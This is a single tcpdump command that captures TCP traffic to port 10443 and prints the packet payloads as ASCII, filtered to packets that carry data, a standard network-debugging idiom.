tcpdump -A -s 0 'tcp dst port 10443 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'




--------------------------------------------------------------------------------